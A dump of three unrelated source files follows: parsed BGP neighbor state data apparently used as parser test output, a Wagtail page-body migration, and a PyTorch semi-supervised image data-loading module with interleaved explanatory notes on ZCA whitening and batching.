"graceful_restart": "disabled",
"io_status": 1,
"ip_precedence_value": 6,
"irs": 547332975,
"iss": 3484933877,
"krtt": 0,
"lock_slow_path": 0,
"max_rtt": 1000,
"maximum_output_segment_queue_size": 50,
"maxrcvwnd": 16384,
"min_rtt": 1,
"min_time_between_advertisement_runs": 0,
"minimum_incoming_ttl": 0,
"option_flags": "nagle, path mtu capable",
"outgoing_ttl": 255,
"packet_fast_path": 0,
"packet_fast_processed": 0,
"packet_slow_path": 0,
"rcv_scale": 0,
"rcvnxt": 547451170,
"rcvwnd": 16365,
"receive_idletime": 33158,
"rib_route_ip": "10.1.1.1",
"rtto": 1003,
"rtv": 3,
"sent_idletime": 33361,
"snd_scale": 0,
"sndnxt": 3485051513,
"snduna": 3485051513,
"sndwnd": 15453,
"srtt": 1000,
"sso": False,
"status_flags": "passive open, gen tcbs",
"tcp_path_mtu_discovery": "enabled",
"tcp_semaphore": "0x7F59978AAB40",
"tcp_semaphore_status": "FREE",
"transport": {
"foreign_host": "10.1.1.1",
"foreign_port": "44730",
"local_host": "10.5.5.5",
"local_port": "179",
"mss": 1396,
},
"unread_input_bytes": 0,
"uptime": 334841877,
},
"bgp_version": 4,
"link": "internal",
"remote_as": 65000,
"router_id": "10.1.1.1",
"session_state": "Established",
"shutdown": False,
},
"10.2.2.2": {
"address_family": {
"ipv4 unicast": {
"advertise_bit": 0,
"bgp_table_version": 1,
"dynamic_slow_peer_recovered": "never",
"index": 1,
"last_detected_dynamic_slow_peer": "never",
"last_received_refresh_end_of_rib": "never",
"last_received_refresh_start_of_rib": "never",
"last_sent_refresh_end_of_rib": "never",
"last_sent_refresh_start_of_rib": "never",
"local_policy_denied_prefixes_counters": {
"inbound": {"total": 0},
"outbound": {"total": 0},
},
"max_nlri": 0,
"min_nlri": 0,
"neighbor_version": "1/0",
"output_queue_size": 0,
"prefix_activity_counters": {
"received": {
"explicit_withdraw": 0,
"implicit_withdraw": 0,
"prefixes_current": 0,
"prefixes_total": 0,
"used_as_bestpath": 0,
"used_as_multipath": 0,
"used_as_secondary": 0,
},
"sent": {
"explicit_withdraw": 0,
"implicit_withdraw": 0,
"prefixes_current": 0,
"prefixes_total": 0,
"used_as_bestpath": "n/a",
"used_as_multipath": "n/a",
"used_as_secondary": "n/a",
},
},
"refresh_activity_counters": {
"received": {
"refresh_end_of_rib": 0,
"refresh_start_of_rib": 0,
},
"sent": {
"refresh_end_of_rib": 0,
"refresh_start_of_rib": 0,
},
},
"refresh_epoch": 1,
"slow_peer_detection": False,
"slow_peer_split_update_group_dynamic": False,
"update_group_member": 1,
},
"vpnv4 unicast": {
"advertise_bit": 1,
"bgp_table_version": 21,
"current_time": "0x13F886BA",
"dynamic_slow_peer_recovered": "never",
"extended_community_attribute_sent": True,
"index": 3,
"last_detected_dynamic_slow_peer": "never",
"last_read": "00:00:04",
"last_received_refresh_end_of_rib": "never",
"last_received_refresh_start_of_rib": "never",
"last_sent_refresh_end_of_rib": "never",
"last_sent_refresh_start_of_rib": "never",
"last_write": "00:00:28",
"local_policy_denied_prefixes_counters": {
"inbound": {
"af_permit_check": "n/a",
"bestpath_from_ibgp_peer": "n/a",
"bestpath_from_this_peer": "n/a",
"originator_loop": 8,
"total": 8,
},
"outbound": {
"af_permit_check": 4,
"bestpath_from_ibgp_peer": 4,
"bestpath_from_this_peer": 4,
"originator_loop": "n/a",
"total": 12,
},
},
"max_nlri": 1,
"min_nlri": 0,
"neighbor_version": "21/0",
"output_queue_size": 0,
"prefix_activity_counters": {
"received": {
"explicit_withdraw": 0,
"implicit_withdraw": 0,
"prefixes_total": 4,
"used_as_bestpath": 0,
"used_as_multipath": 0,
"used_as_secondary": 0,
},
"sent": {
"explicit_withdraw": 0,
"implicit_withdraw": 4,
"prefixes_total": 8,
"used_as_bestpath": "n/a",
"used_as_multipath": "n/a",
"used_as_secondary": "n/a",
},
},
"refresh_activity_counters": {
"received": {
"refresh_end_of_rib": 0,
"refresh_start_of_rib": 0,
},
"sent": {
"refresh_end_of_rib": 0,
"refresh_start_of_rib": 0,
},
},
"refresh_epoch": 1,
"session_state": "Established",
"slow_peer_detection": False,
"slow_peer_split_update_group_dynamic": False,
"up_time": "3d21h",
"update_group_member": 3,
},
},
"bgp_event_timer": {
"next": {
"ackhold": "0x0",
"deadwait": "0x0",
"giveup": "0x0",
"keepalive": "0x0",
"linger": "0x0",
"pmtuager": "0x0",
"processq": "0x0",
"retrans": "0x0",
"sendwnd": "0x0",
"timewait": "0x0",
},
"starts": {
"ackhold": 6142,
"deadwait": 0,
"giveup": 0,
"keepalive": 0,
"linger": 0,
"pmtuager": 0,
"processq": 0,
"retrans": 6139,
"sendwnd": 0,
"timewait": 0,
},
"wakeups": {
"ackhold": 6023,
"deadwait": 0,
"giveup": 0,
"keepalive": 0,
"linger": 0,
"pmtuager": 0,
"processq": 0,
"retrans": 0,
"sendwnd": 0,
"timewait": 0,
},
},
"bgp_neighbor_session": {"sessions": 1},
"bgp_negotiated_capabilities": {
"enhanced_refresh": "advertised and received",
"four_octets_asn": "advertised and received",
"ipv4_unicast": "advertised and received",
"route_refresh": "advertised and received(new)",
"stateful_switchover": "NO for session 1",
"vpnv4_unicast": "advertised and received",
},
"bgp_negotiated_keepalive_timers": {
"hold_time": 180,
"keepalive_interval": 60,
},
"bgp_neighbor_counters": {
"messages": {
"in_queue_depth": 0,
"out_queue_depth": 0,
"received": {
"keepalives": 6139,
"notifications": 0,
"opens": 1,
"route_refresh": 0,
"total": 6154,
"updates": 14,
},
"sent": {
"keepalives": 6134,
"notifications": 0,
"opens": 1,
"route_refresh": 0,
"total": 6145,
"updates": 10,
},
}
},
"bgp_session_transport": {
"ack_hold": 200,
"address_tracking_status": "enabled",
"connection": {
"dropped": 0,
"established": 1,
"last_reset": "never",
},
"connection_state": "estab",
"connection_tableid": 0,
"datagram": {
"datagram_received": {
"out_of_order": 0,
"total_data": 118042,
"value": 12256,
"with_data": 6143,
},
"datagram_sent": {
"fastretransmit": 0,
"partialack": 0,
"retransmit": 0,
"second_congestion": 0,
"total_data": 117407,
"value": 12248,
"with_data": 6139,
},
},
"delrcvwnd": 1273,
"ecn_connection": "disabled",
"enqueued_packets": {
"input_packet": 0,
"mis_ordered_packet": 0,
"retransmit_packet": 0,
},
"fast_lock_acquisition_failures": 0,
"graceful_restart": "disabled",
"io_status": 1,
"ip_precedence_value": 6,
"irs": 2814267610,
"iss": 84959429,
"krtt": 0,
"lock_slow_path": 0,
"max_rtt": 1000,
"maximum_output_segment_queue_size": 50,
"maxrcvwnd": 16384,
"min_rtt": 1,
"min_time_between_advertisement_runs": 0,
"minimum_incoming_ttl": 0,
"option_flags": "nagle, path mtu capable",
"outgoing_ttl": 255,
"packet_fast_path": 0,
"packet_fast_processed": 0,
"packet_slow_path": 0,
"rcv_scale": 0,
"rcvnxt": 2814385653,
"rcvwnd": 15111,
"receive_idletime": 4619,
"rib_route_ip": "10.2.2.2",
"rtto": 1003,
"rtv": 3,
"sent_idletime": 4419,
"snd_scale": 0,
"sndnxt": 85076837,
"snduna": 85076837,
"sndwnd": 15681,
"srtt": 1000,
"sso": False,
"status_flags": "passive open, gen tcbs",
"tcp_path_mtu_discovery": "enabled",
"tcp_semaphore": "0x7F59978AAC10",
"tcp_semaphore_status": "FREE",
"transport": {
"foreign_host": "10.2.2.2",
"foreign_port": "43047",
"local_host": "10.5.5.5",
"local_port": "179",
"mss": 1396,
},
"unread_input_bytes": 0,
"uptime": 334847216,
},
"bgp_version": 4,
"link": "internal",
"remote_as": 65000,
"router_id": "10.2.2.2",
"session_state": "Established",
"shutdown": False,
},
}
}
},
}
# -*- coding: utf-8 -*-
# File: mep/pages/migrations/0009_svg_extended_description.py
# Repo: making-books-ren-today/test_eval_3_shxco (Apache-2.0)
# Generated by Django 1.11.21 on 2019-12-19 14:40
from __future__ import unicode_literals
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.documents.blocks
import wagtail.images.blocks
class Migration(migrations.Migration):
dependencies = [
('pages', '0008_linkable_section_anchor_text'),
]
operations = [
migrations.AlterField(
model_name='contentlandingpage',
name='body',
field=wagtail.core.fields.StreamField([('paragraph', wagtail.core.blocks.RichTextBlock(features=['h3', 'h4', 'bold', 'italic', 'link', 'ol', 'ul', 'blockquote'])), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alternative_text', wagtail.core.blocks.TextBlock(help_text='Alternative text for visually impaired users to\nbriefly communicate the intended message of the image in this context.', required=True)), ('caption', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'link'], required=False))])), ('svg_image', wagtail.core.blocks.StructBlock([('image', wagtail.documents.blocks.DocumentChooserBlock()), ('alternative_text', wagtail.core.blocks.TextBlock(help_text='Alternative text for visually impaired users to\nbriefly communicate the intended message of the image in this context.', required=True)), ('caption', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'link'], required=False)), ('extended_description', wagtail.core.blocks.TextBlock(help_text='This text will only be read to non-sighted users and should describe the major insights or takeaways from the graphic. Multiple paragraphs are allowed.', required=False))])), ('document', wagtail.documents.blocks.DocumentChooserBlock()), ('footnotes', wagtail.core.blocks.RichTextBlock(classname='footnotes', features=['ol', 'ul', 'bold', 'italic', 'link'])), ('linkable_section', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock()), ('anchor_text', wagtail.core.blocks.CharBlock(help_text='Short label for anchor link')), ('body', wagtail.core.blocks.RichTextBlock())]))], blank=True),
),
migrations.AlterField(
model_name='contentpage',
name='body',
field=wagtail.core.fields.StreamField([('paragraph', wagtail.core.blocks.RichTextBlock(features=['h3', 'h4', 'bold', 'italic', 'link', 'ol', 'ul', 'blockquote'])), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alternative_text', wagtail.core.blocks.TextBlock(help_text='Alternative text for visually impaired users to\nbriefly communicate the intended message of the image in this context.', required=True)), ('caption', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'link'], required=False))])), ('svg_image', wagtail.core.blocks.StructBlock([('image', wagtail.documents.blocks.DocumentChooserBlock()), ('alternative_text', wagtail.core.blocks.TextBlock(help_text='Alternative text for visually impaired users to\nbriefly communicate the intended message of the image in this context.', required=True)), ('caption', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'link'], required=False)), ('extended_description', wagtail.core.blocks.TextBlock(help_text='This text will only be read to non-sighted users and should describe the major insights or takeaways from the graphic. Multiple paragraphs are allowed.', required=False))])), ('document', wagtail.documents.blocks.DocumentChooserBlock()), ('footnotes', wagtail.core.blocks.RichTextBlock(classname='footnotes', features=['ol', 'ul', 'bold', 'italic', 'link'])), ('linkable_section', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock()), ('anchor_text', wagtail.core.blocks.CharBlock(help_text='Short label for anchor link')), ('body', wagtail.core.blocks.RichTextBlock())]))]),
),
migrations.AlterField(
model_name='essaylandingpage',
name='body',
field=wagtail.core.fields.StreamField([('paragraph', wagtail.core.blocks.RichTextBlock(features=['h3', 'h4', 'bold', 'italic', 'link', 'ol', 'ul', 'blockquote'])), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alternative_text', wagtail.core.blocks.TextBlock(help_text='Alternative text for visually impaired users to\nbriefly communicate the intended message of the image in this context.', required=True)), ('caption', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'link'], required=False))])), ('svg_image', wagtail.core.blocks.StructBlock([('image', wagtail.documents.blocks.DocumentChooserBlock()), ('alternative_text', wagtail.core.blocks.TextBlock(help_text='Alternative text for visually impaired users to\nbriefly communicate the intended message of the image in this context.', required=True)), ('caption', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'link'], required=False)), ('extended_description', wagtail.core.blocks.TextBlock(help_text='This text will only be read to non-sighted users and should describe the major insights or takeaways from the graphic. Multiple paragraphs are allowed.', required=False))])), ('document', wagtail.documents.blocks.DocumentChooserBlock()), ('footnotes', wagtail.core.blocks.RichTextBlock(classname='footnotes', features=['ol', 'ul', 'bold', 'italic', 'link'])), ('linkable_section', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock()), ('anchor_text', wagtail.core.blocks.CharBlock(help_text='Short label for anchor link')), ('body', wagtail.core.blocks.RichTextBlock())]))], blank=True),
),
migrations.AlterField(
model_name='essaypage',
name='body',
field=wagtail.core.fields.StreamField([('paragraph', wagtail.core.blocks.RichTextBlock(features=['h3', 'h4', 'bold', 'italic', 'link', 'ol', 'ul', 'blockquote'])), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alternative_text', wagtail.core.blocks.TextBlock(help_text='Alternative text for visually impaired users to\nbriefly communicate the intended message of the image in this context.', required=True)), ('caption', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'link'], required=False))])), ('svg_image', wagtail.core.blocks.StructBlock([('image', wagtail.documents.blocks.DocumentChooserBlock()), ('alternative_text', wagtail.core.blocks.TextBlock(help_text='Alternative text for visually impaired users to\nbriefly communicate the intended message of the image in this context.', required=True)), ('caption', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'link'], required=False)), ('extended_description', wagtail.core.blocks.TextBlock(help_text='This text will only be read to non-sighted users and should describe the major insights or takeaways from the graphic. Multiple paragraphs are allowed.', required=False))])), ('document', wagtail.documents.blocks.DocumentChooserBlock()), ('footnotes', wagtail.core.blocks.RichTextBlock(classname='footnotes', features=['ol', 'ul', 'bold', 'italic', 'link'])), ('linkable_section', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock()), ('anchor_text', wagtail.core.blocks.CharBlock(help_text='Short label for anchor link')), ('body', wagtail.core.blocks.RichTextBlock())]))]),
),
migrations.AlterField(
model_name='homepage',
name='body',
field=wagtail.core.fields.StreamField([('paragraph', wagtail.core.blocks.RichTextBlock(features=['h3', 'h4', 'bold', 'italic', 'link', 'ol', 'ul', 'blockquote'])), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('alternative_text', wagtail.core.blocks.TextBlock(help_text='Alternative text for visually impaired users to\nbriefly communicate the intended message of the image in this context.', required=True)), ('caption', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'link'], required=False))])), ('svg_image', wagtail.core.blocks.StructBlock([('image', wagtail.documents.blocks.DocumentChooserBlock()), ('alternative_text', wagtail.core.blocks.TextBlock(help_text='Alternative text for visually impaired users to\nbriefly communicate the intended message of the image in this context.', required=True)), ('caption', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'link'], required=False)), ('extended_description', wagtail.core.blocks.TextBlock(help_text='This text will only be read to non-sighted users and should describe the major insights or takeaways from the graphic. Multiple paragraphs are allowed.', required=False))])), ('document', wagtail.documents.blocks.DocumentChooserBlock()), ('footnotes', wagtail.core.blocks.RichTextBlock(classname='footnotes', features=['ol', 'ul', 'bold', 'italic', 'link'])), ('linkable_section', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock()), ('anchor_text', wagtail.core.blocks.CharBlock(help_text='Short label for anchor link')), ('body', wagtail.core.blocks.RichTextBlock())]))]),
),
]
# File: data.py
# Repo: jjYukgm/SSL_multi_decoder (MIT)
import numpy as np
import torch
from torchvision.datasets import MNIST, SVHN, CIFAR10, STL10
from torchvision import transforms
import os
import torchvision.utils as vutils
# for coil
from PIL import Image
# from scipy import io
class DataLoader(object):
def __init__(self, config, raw_loader, indices, batch_size):
self.images, self.labels = [], []
for idx in indices:
image, label = raw_loader[idx]
self.images.append(image)
self.labels.append(label)
self.images = torch.stack(self.images, 0)
self.labels = np.array(self.labels, dtype=np.int64)
if config.num_label != 10 and config.dataset == 'cifar': # reorder the label
lbl_range = config.allowed_label.split(",")
lbl_range = [int(i) for i in lbl_range]
lbl_range.sort()
for i, j in enumerate(lbl_range):
self.labels[self.labels == j] = i
self.labels = torch.from_numpy(self.labels).squeeze()
if config.dataset == 'mnist':
self.images = self.images.view(self.images.size(0), -1)
self.batch_size = batch_size
self.unlimit_gen = self.generator(True)
self.len = len(indices)
def get_zca_cuda(self, reg=1e-6):
images = self.images.cuda()
if images.dim() > 2:
images = images.view(images.size(0), -1)
mean = images.mean(0)
images -= mean.expand_as(images)
sigma = torch.mm(images.transpose(0, 1), images) / images.size(0)
U, S, V = torch.svd(sigma)
components = torch.mm(torch.mm(U, torch.diag(1.0 / torch.sqrt(S + reg))), U.transpose(0, 1))  # reg inside sqrt so near-zero eigenvalues stay finite
return components, mean
def apply_zca_cuda(self, components):
images = self.images.cuda()
if images.dim() > 2:
images = images.view(images.size(0), -1)
self.images = torch.mm(images, components.transpose(0, 1)).cpu()
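The two methods above compute and apply ZCA whitening: build the covariance of the flattened images, take its SVD, and form `U diag(1/sqrt(S + reg)) U^T` as the whitening matrix. A minimal CPU-only numpy sketch of the same math (function names here are illustrative, not part of this repo) — after whitening, the empirical covariance should be close to the identity:

```python
import numpy as np

def zca_components(x, reg=1e-6):
    # x: (n, d) float array; returns (components, mean) such that
    # (x - mean) @ components.T has approximately identity covariance.
    mean = x.mean(axis=0)
    xc = x - mean
    sigma = xc.T @ xc / xc.shape[0]
    u, s, _ = np.linalg.svd(sigma)          # sigma is symmetric PSD, so SVD == eigendecomposition
    components = u @ np.diag(1.0 / np.sqrt(s + reg)) @ u.T
    return components, mean

rng = np.random.default_rng(0)
x = rng.normal(size=(500, 4)) @ rng.normal(size=(4, 4))  # correlated toy data
w, mu = zca_components(x)
xw = (x - mu) @ w.T
cov = xw.T @ xw / xw.shape[0]               # ~ identity up to the regularizer
```

Note the regularizer sits inside the square root (`1/sqrt(S + reg)`), the standard ZCA formulation, which keeps the transform finite even when some eigenvalues are numerically zero.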
def generator(self, inf=False, shuffle=True):
while True:
indices = np.arange(self.images.size(0))
if shuffle:
np.random.shuffle(indices)
indices = torch.from_numpy(indices)
for start in range(0, indices.size(0), self.batch_size):
end = min(start + self.batch_size, indices.size(0))
ret_images, ret_labels = self.images[indices[start: end]], self.labels[indices[start: end]]
yield ret_images, ret_labels
if not inf: break
def next(self):
return next(self.unlimit_gen)
def get_iter(self, shuffle=True):
return self.generator(shuffle=shuffle)
def __len__(self):
return self.len
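`DataLoader.generator` implements the epoch loop used everywhere in this file: reshuffle the index array once per epoch, slice consecutive minibatches, and loop forever when `inf=True` (the `unlimit_gen` used by `next()`). A self-contained numpy sketch of that pattern (names are illustrative):

```python
import numpy as np

def minibatches(data, batch_size, inf=False, shuffle=True, seed=0):
    # Shuffle indices once per epoch, then yield consecutive slices;
    # the final batch may be smaller. Loops forever when inf=True.
    rng = np.random.default_rng(seed)
    while True:
        idx = np.arange(len(data))
        if shuffle:
            rng.shuffle(idx)
        for start in range(0, len(idx), batch_size):
            end = min(start + batch_size, len(idx))
            yield data[idx[start:end]]
        if not inf:
            break

batches = list(minibatches(np.arange(10), 3))  # one epoch: 3+3+3+1 examples
```

Because the generator re-derives the index permutation at the top of every epoch, the infinite variant never repeats the same ordering unless the RNG does.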
class DataBatchLoader(object):
def __init__(self, config, raw_loader, indices, batch_size,
transform=None, target_transform=None, img_side=224):
# todo: add str load img
self.folder_root = raw_loader.folder_root
self.images, self.labels = [], []
for idx in indices:
image, label = raw_loader[idx]
self.images.append(image)
self.labels.append(label)
self.images = np.array(self.images)
self.labels = np.array(self.labels, dtype=np.int64)
self.transform = transform
self.target_transform = target_transform
self.img_side = img_side
if config.num_label != 1000: # reorder the label
lbl_range = np.unique(self.labels)
for i, j in enumerate(lbl_range):
self.labels[self.labels == j] = i
self.labels = torch.from_numpy(self.labels).squeeze()
self.batch_size = batch_size
self.unlimit_gen = self.generator(True)
self.len = len(indices)
def generator(self, inf=False, shuffle=True):
while True:
indices = np.arange(self.images.shape[0])
if shuffle:
np.random.shuffle(indices)
# indices = torch.from_numpy(indices)
for start in range(0, indices.shape[0], self.batch_size):
end = min(start + self.batch_size, indices.shape[0])
ret_images = self.__loadimg(indices[start: end])
lab_ind = torch.from_numpy(indices[start: end])
ret_labels = self.labels[lab_ind]
yield ret_images, ret_labels
if not inf: break
def next(self):
return next(self.unlimit_gen)
def get_iter(self, shuffle=True):
return self.generator(shuffle=shuffle)
def __len__(self):
return self.len
def __loadimg(self, inds):
fns = self.images[inds]
images = []
for fn in fns:
path_to_data = os.path.join(self.folder_root, fn)
data = Image.open(path_to_data).convert('RGB') # HWC
data = data.resize((self.img_side, self.img_side), Image.ANTIALIAS) # ANTIALIAS;BILINEAR
# transforms
if self.transform is not None:
data = self.transform(data)
images.append(data)
images = torch.stack(images, 0)
return images
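Both loader classes remap a chosen subset of original class ids onto contiguous ids `0..k-1` (the `num_label != 10`/`1000` branches): sort the surviving labels and overwrite each with its rank. A small sketch of that relabeling (the helper name is illustrative); writing into a copy avoids any risk of one remapped id being clobbered by a later pass, which the in-place loops above avoid only because the targets are always ≤ the sources:

```python
import numpy as np

def reindex_labels(labels):
    # Map an arbitrary set of class ids (e.g. {3, 5, 8}) onto 0..k-1,
    # in sorted order of the original ids.
    out = labels.copy()
    for new_id, old_id in enumerate(np.unique(labels)):
        out[labels == old_id] = new_id
    return out

y = reindex_labels(np.array([5, 3, 8, 3, 5]))  # ids {3, 5, 8} -> {0, 1, 2}
```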
class coil20(CIFAR10):
"""`COIL20 <https://>`_ Dataset.
"""
base_folder = 'coil-20-proc'
url = "http://www.cs.columbia.edu/CAVE/databases/SLAM_coil-20_coil-100/coil-20/coil-20-proc.zip"
filename = "coil-20-proc.zip"
tgz_md5 = '464dec76a6abfcd00e8de6cf1e7d0acc' # tar.gz: 891c9b54622b6b676d91b54eae340c1b
class_names_file = ''
def __init__(self, root,
transform=None, target_transform=None, download=False, img_side=128):
self.root = os.path.expanduser(root)
self.transform = transform
self.target_transform = target_transform
self.img_side = img_side
if download:
self.download2()
# if not self._check_integrity():
# raise RuntimeError(
# 'Dataset not found or corrupted. '
# 'You can use download=True to download it')
# now load the picked numpy arrays
self.data, self.labels = self.__loadfile()
class_file = os.path.join(
root, self.base_folder, self.class_names_file)
if os.path.isfile(class_file):
with open(class_file) as f:
self.classes = f.read().splitlines()
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is index of the target class.
"""
if self.labels is not None:
img, target = self.data[index], int(self.labels[index])
else:
img, target = self.data[index], None
# doing this so that it is consistent with all other datasets
# to return a PIL Image
img = Image.fromarray(img)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
def __len__(self):
return self.data.shape[0]
def __loadfile(self):
images = []
labels = np.arange(20, dtype=int).repeat(72)
data_pattern = lambda a, b: "obj{}__{}.png".format(a + 1, b) # a: [0,19]; b: [0,71]
for c in range(20): # 0-based
for i in range(72):
data_file = data_pattern(c, i)
path_to_data = os.path.join(self.root, self.base_folder, data_file)
data = Image.open(path_to_data).convert('RGB') # HWC
data = data.resize((self.img_side, self.img_side), Image.ANTIALIAS) # ANTIALIAS;BILINEAR
data = np.array(data)
data = np.expand_dims(data, axis=0)
images.append(data)
images = np.concatenate(images, axis=0)
# images = np.transpose(images, (0, 3, 1, 2))
# images = images / 255. # value:[0, 1]
return images, labels
def download2(self):
import zipfile
def download_url(url, froot, filename, md5):
import hashlib
import errno
from six import moves
def check_integrity(fpath_, md5_):
if not os.path.isfile(fpath_):
return False
md5o = hashlib.md5()
with open(fpath_, 'rb') as f:
# read the file in 1 MB chunks
for chunk in iter(lambda: f.read(1024 * 1024), b''):
md5o.update(chunk)
md5c = md5o.hexdigest()
if md5c != md5_:
return False
return True
froot = os.path.expanduser(froot)
fpath = os.path.join(froot, filename)
try:
os.makedirs(froot)
except OSError as e:
if e.errno == errno.EEXIST:
pass
else:
raise
# downloads file
if os.path.isfile(fpath) and check_integrity(fpath, md5):
print('Using downloaded and verified file: ' + fpath)
else:
print('Downloading ' + url + ' to ' + fpath)
moves.urllib.request.urlretrieve(url, fpath)
if self._check_integrity():
print('Files already downloaded and verified')
return
root = self.root
download_url(self.url, root, self.filename, self.tgz_md5)
# extract file
# cwd = os.getcwd()
zf = zipfile.ZipFile(os.path.join(root, self.filename), "r")
zf.extractall(root)
zf.close()
# os.chdir(cwd)
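The `check_integrity` closure inside `download2` hashes the archive incrementally so a multi-hundred-MB download never has to fit in memory. The core of that idiom, isolated (the function name is illustrative; `io.BytesIO` stands in for a real file handle):

```python
import hashlib
import io

def md5_of_stream(f, chunk_size=1024 * 1024):
    # Feed fixed-size chunks into the hash object; iter(callable, sentinel)
    # stops when read() returns b'' at end of file.
    h = hashlib.md5()
    for chunk in iter(lambda: f.read(chunk_size), b''):
        h.update(chunk)
    return h.hexdigest()

digest = md5_of_stream(io.BytesIO(b'hello world'))
```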
class imagenet10(CIFAR10):
"""`imagenet10 <https://>`_ Dataset.
"""
base_folder = 'imagenet'
foldernames = ["ILSVRC2012_img_train", "ILSVRC2012_img_val", "ILSVRC2012_img_test"]
def __init__(self, root, splitpart, target_transform=None):
self.root = os.path.expanduser(root)
self.target_transform = target_transform
self.data = []
self.labels = []
if "train" in splitpart:
data, labels = self.__loadfile(self.foldernames[0], "train")
self.data.append(data)
self.labels.append(labels)
if "val" in splitpart:
data, labels = self.__loadfile(self.foldernames[1], "val")
self.data.append(data)
self.labels.append(labels)
if "test" in splitpart:
data, labels = self.__loadfile(self.foldernames[2], "test")
self.data.append(data)
self.labels.append(labels)
self.data = np.concatenate(self.data, axis=0)
self.labels = np.concatenate(self.labels, axis=0)
self.folder_root = os.path.join(self.root, self.base_folder)
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image_str, target) where target is index of the target class.
"""
if self.labels is not None:
img, target = self.data[index], int(self.labels[index])
else:
img, target = self.data[index], None
# doing this so that it is consistent with all other datasets
# to return a PIL Image
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
def __len__(self):
return self.data.shape[0]
def __loadfile(self, foldername, labfname):
images = []
labels = []
fn = os.path.join(self.root, self.base_folder, "label", labfname+".txt")
fp = open(fn, "r")
for li in fp:
image, label = li.split(" ")
images.append(os.path.join(foldername, image))
labels.append(int(label[:-1])) # cut '\n'
fp.close()
return images, labels
def get_mnist_loaders(config):
transform = transforms.Compose([transforms.ToTensor()])
training_set = MNIST(config.data_root, train=True, download=True, transform=transform)
dev_set = MNIST(config.data_root, train=False, download=True, transform=transform)
indices = np.arange(len(training_set))
np.random.shuffle(indices)
mask = np.zeros(indices.shape[0], dtype=bool)
labels = np.array([training_set[i][1] for i in indices], dtype=np.int64)
for i in range(10):
mask[np.where(labels == i)[0][: config.size_labeled_data // 10]] = True
labeled_indices, unlabeled_indices = indices[mask], indices[~mask]
print('labeled size', labeled_indices.shape[0], 'unlabeled size', unlabeled_indices.shape[0])
labeled_loader = DataLoader(config, training_set, labeled_indices, config.train_batch_size)
unlabeled_loader = DataLoader(config, training_set, unlabeled_indices, config.train_batch_size)
dev_loader = DataLoader(config, dev_set, np.arange(len(dev_set)), config.dev_batch_size)
special_set = []
for i in range(10):
special_set.append(training_set[indices[np.where(labels == i)[0][0]]][0])
special_set = torch.stack(special_set)
return labeled_loader, unlabeled_loader, dev_loader, special_set
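Every `get_*_loaders` function above builds its labeled split the same way: shuffle the index pool once, then flip a boolean mask on the first `size_labeled_data / num_classes` occurrences of each class, so the labeled set is class-balanced by construction. A minimal sketch of that stratified selection (the helper name is illustrative):

```python
import numpy as np

def stratified_label_mask(labels, per_class, num_classes):
    # Boolean mask selecting the first `per_class` examples of each
    # class, in the (pre-shuffled) order the labels are given.
    mask = np.zeros(len(labels), dtype=bool)
    for c in range(num_classes):
        mask[np.where(labels == c)[0][:per_class]] = True
    return mask

labels = np.array([0, 1, 0, 1, 0, 1, 0, 1])
mask = stratified_label_mask(labels, 2, 2)  # 2 examples per class
```

Because the indices were shuffled before the labels array was materialized, "first `per_class` per class" is effectively a uniform random draw within each class.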
def get_svhn_loaders(config):
transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
training_set = SVHN(config.data_root, split='train', download=True, transform=transform)
dev_set = SVHN(config.data_root, split='test', download=True, transform=transform)
def preprocess(data_set):
for j in range(len(data_set.data)):
if data_set.labels[j][0] == 10:
data_set.labels[j][0] = 0
preprocess(training_set)
preprocess(dev_set)
indices = np.arange(len(training_set))
np.random.shuffle(indices)
mask = np.zeros(indices.shape[0], dtype=bool)
labels = np.array([training_set[i][1] for i in indices], dtype=np.int64)
for i in range(10):
mask[np.where(labels == i)[0][: config.size_labeled_data // 10]] = True
# labeled_indices, unlabeled_indices = indices[mask], indices[~mask]
labeled_indices, unlabeled_indices = indices[mask], indices
print('labeled size', labeled_indices.shape[0], 'unlabeled size', unlabeled_indices.shape[0], 'dev size', len(dev_set))
labeled_loader = DataLoader(config, training_set, labeled_indices, config.train_batch_size)
unlabeled_loader = DataLoader(config, training_set, unlabeled_indices, config.train_batch_size)
dev_loader = DataLoader(config, dev_set, np.arange(len(dev_set)), config.dev_batch_size)
special_set = []
for i in range(10):
special_set.append(training_set[indices[np.where(labels == i)[0][0]]][0])
special_set = torch.stack(special_set)
return labeled_loader, unlabeled_loader, dev_loader, special_set
def get_cifar_loaders_test(config, lab_ind=True):
tr_list = []
if hasattr(config, 'image_side') and config.image_side != 32: # resize
tr_list.append(transforms.Resize(config.image_side))
tr_list += [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]
# tr_list += [transforms.ToTensor(), transforms.Normalize((0.53, 0.53, 0.52), (0.29, 0.29, 0.28))]
transform = transforms.Compose(tr_list)
training_set = CIFAR10('cifar', train=True, download=True, transform=transform)
